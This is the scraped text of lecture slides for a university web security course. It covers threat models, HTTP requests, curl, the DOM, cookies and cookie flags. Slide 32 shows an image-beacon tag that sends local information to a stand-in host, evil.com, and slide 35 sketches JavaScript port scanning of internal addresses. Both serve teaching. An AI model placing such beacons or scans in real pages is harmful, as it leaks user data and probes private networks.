CSE484/CSE584 BASIC WEB SECURITY MODEL Dr. Benjamin Livshits Web - - PowerPoint PPT Presentation

cse484 cse584
SMART_READER_LITE
LIVE PREVIEW

CSE484/CSE584 BASIC WEB SECURITY MODEL Dr. Benjamin Livshits Web - - PowerPoint PPT Presentation

Oct 03, 2023 457 likes •910 views

CSE484/CSE584 BASIC WEB SECURITY MODEL Dr. Benjamin Livshits Web Security Web Attacker Sets up malicious site visited by victim; no control of network Alice Network Security Network Attacker Intercepts and controls network communication

slide-1
SLIDE 1

CSE484/CSE584

BASIC WEB SECURITY MODEL

  • Dr. Benjamin Livshits
slide-2
SLIDE 2

Web Attacker Sets up malicious site visited by victim; no control of network Alice

Web Security

slide-3
SLIDE 3

Network Attacker Intercepts and controls network communication Alice

Network Security

slide-4
SLIDE 4

Malware Attacker Escapes the browser to wreak havoc on Alice’s machine Alice

Web Malware Attacker

slide-5
SLIDE 5

Web Threat Models

 Web attacker

 Control https://attacker.com  Can obtain SSL/TLS certificate for https://attacker.com  User visits attacker.com

 Or: runs attacker’s Facebook app, etc.  Network attacker

 Passive: Wireless eavesdropper  Active: Evil router, DNS poisoning

 Malware attacker

 Attacker escapes browser isolation mechanisms and run

separately under control of OS

This is what connects the world

  • f web attacks to low-level

memory-based exploitation we’ve seen so far

slide-6
SLIDE 6

Goals of Web Security

 Users should be able to

visit a variety of web sites, without incurring harm:

 No stolen information

such as login credentials or cookies

 Site A cannot compromise

session at Site B

 Applications delivered over

the web should have the sa same se security propertie ies we require for stand-alone applications

 Maybe even better

properties because most web applications enjoy the protection provided by memory ry-safe lan languages Sa Safely browse th the web

Support secu ecure e web eb applic lications

We will see a lot

  • f Java and PHP

and JavaScript, but not C or C++

slide-7
SLIDE 7

Looking Ahead

 HTTP  Rendering content  Cookies  Isolation  Communication  Navigation  Security User Interface  Frames and frame

busting

slide-8
SLIDE 8

HTTP

slide-9
SLIDE 9

URLs or URIs

 Global identifiers of network-retrievable documents  Example

le:

 Special characters are encoded as hex:

 %0A = newline  %20 or + = space, %2B = + (special exception)

Protocol Hostname Port Path Fragment

https://courses.cs.washington.edu:80/courses/cse484/14au/#schedule

slide-10
SLIDE 10

Short and Long URLs

10 10

Bit.ly: http://bit.ly/1vEIGks

http://longurlmaker.com:

http://www.longurlmaker.com/go?id=7continuedg20fIs.gd0GetShortyagl56001drawn%2Boutu6lingeringShortlinksX .sestretchedd7lingeringzc8faraway0UrlTeajbstretched15jcontinued011expanded86v3stretchedqdXil40ShortenURLk Xilz401spun%2Boutq54bextensiveShrtndwoutstretched151TinyLinkcontinued2lastingdltallaU76nr0h61g5aIs.gdd01 41cMooURL085ShortURLcShortenURL40stretchrangyXil3p17hSitelutionsuwURLvi1enlargedc03743186701Dwarfurl 4aefwextensive0EasyURL315continuedbprotractedb19GetShorty2SHurl171enduring038r8bURLviremote6URL1Shor tURLspun%2Boutelongated0aX.seoutstretched0d4distantSimURL27highd418olasting9ShoterLink8stretchedoSHurl4 lankydrawn%2Bout0drawn%2Boutlofty19a2kenduringShortenURLxs0spread%2Bout9distantFly2d10101great0w78 NutshellURL190Minilienstretchedn0stretchd0ShortenURL0enlargedtallX.seelongated9URL.co.ukspun%2BoutURLvi8 e1012Shim00Ulimit7lasting3Shim034far%2Boff47spun%2Bout17nwelongated17a99eeexpandedtallm9MooURL1dr emote46URL11NutshellURLStartURLb5itall40c6Shrinkr0Fly2lasting91n8clengthened51X.se5Minilien2ShredURLBea m.to99continued131G8L1ffarawaycontinued0distantrangy7c04964300315a2RubyURLfU76154j1roh82lengthened0 faraway1z4outstretched1lr1B654301URL09stringyq8ShrinkURL184h7Dwarfurldrunningloftylingering18spread%2Bo ut68101ShortURL10kalengthy9B653ab41fextensive0prolonged7p11expandedprolongedremotec2Minilien0dB65str etchingarfaraway3extensive1yclnk.in9lankygreat50TightURL173cURL.co.ukmba2049815920prolonged8fprotractedf 0stringy6i164eelongatedMiniliene9elongated0PiURL1488gd2020a30far%2Breachinglengthy216d411t691elongate1 6extensived0drawn%2Bout11lankyYepItB65Shim31extensiveURLCutterShim99GetShorty1042Fly2af0e8protractede longatey0111563FhURL9c3TinyURLn8toweringDwarfurl10d6350c5TightURL3lnk.in03Shrtnd6g0lingering18gangling prolonged8astringy7StartURL100TraceURLSmallr01drawn%2Bout60ganglingstringy80Beam.tocdistantsG8LX.sedra wn%2Boutedrawn%2Bouty040SitelutionsU7601drawn%2Bout6f53A2N2lasting1194stretchinggangling20lnk.inURLC utter135b80b3ShortURL6far%2Boffm013q515deep8WapURLShrinkURLd410090lnk.infar%2Boff701far%2Boff96ling ering8a6x38118Redirxfar%2Breaching1stretched0protracted16t0l21130b90106zShoterLink967Smallr9R

slide-11
SLIDE 11

GET /index.html HTTP/1.1 Accept: image/gif, image/x-bitmap, image/jpeg, */* Accept-Language: en Connection: Keep-Alive User-Agent: Mozilla/1.22 (compatible; MSIE 2.0; Windows 95) Host: www.example.com Referer: http://www.google.com?q=dingbats

HTTP Request

Method File HTTP version Headers Data – none for GET Blank line

GET : no side effect POST : possible side effect

slide-12
SLIDE 12

POST

12 12 POST /pass.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Referer: http://127.0.0.1/pass.php Cookie: passx=87e8af376bc9d9bfec2c7c0193e6af70; PHPSESSID=l9hk7mfh0ppqecg8gialak6gt5 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 30 username=zurfyx&pass=password

slide-13
SLIDE 13

Automation with CURL

13 13

 curl --data

"birthyear=1905&press=%20OK%20" http://www.example.com/when.cgi

 curl --data-urlencode "name=I am

Daniel" http://www.example.com

 Submit/POST binary data to a URL

 curl -X POST --data-binary @myfile.bin

http://foo.com

slide-14
SLIDE 14

HTTP/1.0 200 OK Date: Sun, 21 Apr 1996 02:20:42 GMT Server: Microsoft-Internet-Information-Server/5.0 Connection: keep-alive Content-Type: text/html Last-Modified: Thu, 18 Apr 1996 17:39:05 GMT Set-Cookie: … Content-Length: 2543 <HTML> Some data... blah, blah, blah </HTML>

HTTP Response

HTTP version Status code Reason phrase Headers Data Cookies

slide-15
SLIDE 15

Common HTTP Codes

200 OK 300 Multiple Choices 301 Moved Permanently 302 Found 304 Not Modified 307 Temporary Redirect 400 Bad Request 401 Unauthorized 403 Forbidden 404 Not Found 410 Gone 500 Internal Server Error 501 Not Implemented 503 Service Unavailable 550 Permission denied

15 15

slide-16
SLIDE 16

Browser Tools

16 16

slide-17
SLIDE 17

Watch the HTTP Traffic

17 17

slide-18
SLIDE 18

HTTP Supports Caching

18 18

slide-19
SLIDE 19

And Responses Can Be Interesting

19 19

slide-20
SLIDE 20

And Surprising…

20 20

slide-21
SLIDE 21

Interacting with Google using CURL

21 21

  • 1. Authenticate with Google first

curl https://www.google.com/accounts/ClientLogin --data- urlencode Email=you@gmail.com --data-urlencode Passwd=yourpasswd

  • d accountType=GOOGLE -d source=your.org-your.service-

your.service.version -d service=wise

SID=DQAAANcAAABjXXX; LSID=DQAAANoAXXX; Auth=DQAAANkAXXX

  • 2. Get your spreadsheets

curl --silent --header "Authorization: GoogleLogin auth=DQAAANkAXXX" "https://spreadsheets.google.com/feeds/spreadsheets/private/full " | tidy -xml -indent -quiet

  • 3. Get a particular spreadsheet

curl --silent --header "Authorization: GoogleLogin auth=$AUTH" "https://spreadsheets.google.com/feeds/download/spreadsheets/Exp

  • rt?key=$KEY&exportFormat=tsv" | sort -n -k 15 -t $'\t'
slide-22
SLIDE 22

Rendering Content

slide-23
SLIDE 23

Rendering and Events

 Each browser window

  • r frame…

 Loads content  Renders it

 Processes HTML and

scripts to display page

 May involve images,

sub-frames, etc.

 Responds to events

 Events can be

 User actions:

 OnClick  OnMouseover

 Rendering:

 OnLoad  OnBeforeUnload

 Timing:

 setTimeout()  clearTimeout()

slide-24
SLIDE 24

Connecting it All Together

24 24

slide-25
SLIDE 25

Slightly More Complex…

25 25

slide-26
SLIDE 26

Document Object Model (DOM)

Object-oriented interface used to read and write docs

 Web page in HTML is structured data  DOM provides representation of this

hierarchy

Includes Browser Object Model (BOM)

 window  document  frames[]  history  location  navigator (type and version of

browser)

slide-27
SLIDE 27

Deep DOM Trees

27 27

slide-28
SLIDE 28

Pre-Year 2000

frame

28 28

slide-29
SLIDE 29

Pre-Year 2000: Functionality Added Via JavaScript

frame

29 29

slide-30
SLIDE 30

Changing HTML using JavaScript, DOM

 Some possibilities  createElement(elementName)  createTextNode(text)  appendChild(newChild)  removeChild(node)  Example: Add a new list item:

var list = document.getElementById('t1') var newitem = document.createElement('li') var newtext = document.createTextNode(text) list.appendChild(newitem) newitem.appendChild(newtext) <ul id="t1"> <li> Item 1 </li> </ul> HTML

slide-31
SLIDE 31

HTML Image Tags

<html> … <p> … </p> … <img src=“http://example.com/ sunset.gif” height="50" width="100"> … </html>

31 31

Any security issues?

slide-32
SLIDE 32

Image Beacons

 Communicate with other sites  <img

src=“http://evil.com/pass- local- information.jpg?extra_info rmation”>

 Hide resulting image  <img src=“ … ” height=“1"

width=“1">

 Spoof other sites: add logos that

fool a user

32 32

slide-33
SLIDE 33

Beacons in Practice

33 33

slide-34
SLIDE 34
  • nError in JavaScript

 Triggered in case of error  Can register a JavaScript

handler

<img src="image.gif"

  • nerror=

"alert( 'The image couldn’t be loaded.')“ >

34 34

slide-35
SLIDE 35

Port Scanning Behind A Firewall

 JavaScript can:  Request images from internal IP addresses

 Example: <img src=“192.168.0.4:8080”/>  Use timeout/onError to determine success/failure  Fingerprint webapps using known image names

Server Malicious Web page Firewall

1) “show me dancing pigs!” 2) “check this out”

Browser

scan scan scan

3) port scan results

slide-36
SLIDE 36

36 36

Break…

slide-37
SLIDE 37

Cookies: Client State

37

slide-38
SLIDE 38

Cookies: Browser State

Browser

Server

POST … HTTP Header: Set-cookie: NAME=VALUE ; domain = (who can read) ; expires = (when expires) ; secure = (only over SSL) Browser

Server

POST … Cookie: NAME = VALUE HTTP is stateless protocol; cookies add state If expires=NULL: this session only

slide-39
SLIDE 39

Cookie-Based Authentication

Browser Web Server Auth server POST login.cgi Username & pwd Validate user auth=val Store val Set-cookie: auth=val GET restricted.html Cookie: auth=val restricted.html auth=val YES/NO If YES, restricted.html Check val

slide-40
SLIDE 40

Cookie Security Policy

 Uses:

 User authentication  Personalization  User tracking: e.g. Doubleclick (3rd party cookies)

 Browser will store:

 At most 20 cookies/site, 3 KB / cookie

 Origin is the tuple <domain, path>

 Can set cookies valid across a domain suffix

slide-41
SLIDE 41

Cookies From www.marketplace.org

41 41

slide-42
SLIDE 42

Secure Cookies

Browser

Server

GET … HTTP Header: Set-cookie: NAME=VALUE ; Secure=true

 Provides confidentiality against network attacker  Browser will only send cookie back over HTTPS  No integrity  Can rewrite secure cookies over HTTP  Network attacker can rewrite secure cookie  Can log user into attacker’s account

slide-43
SLIDE 43

A Real Secure Set-Cookie Request

43 43

slide-44
SLIDE 44

httpOnly Cookies

Browser

Server

GET … HTTP Header: Set-cookie: NAME=VALUE ; httpOnly

 Cookie sent over HTTP(s), but not

  • t ac

accessib ible le to scripts

 cannot be read via document.cookie  Helps prevent cookie theft via XSS  … but does not stop most other risks of XSS bugs